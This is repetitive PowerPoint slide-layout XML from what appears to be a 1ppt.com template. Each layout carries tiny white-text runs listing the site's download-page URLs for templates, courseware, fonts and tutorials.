              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout129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29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29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29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3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30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30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30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30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30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30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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout130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30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30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30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3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31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31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31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31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31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31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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout131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31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31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31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3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32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32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32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32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32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32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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
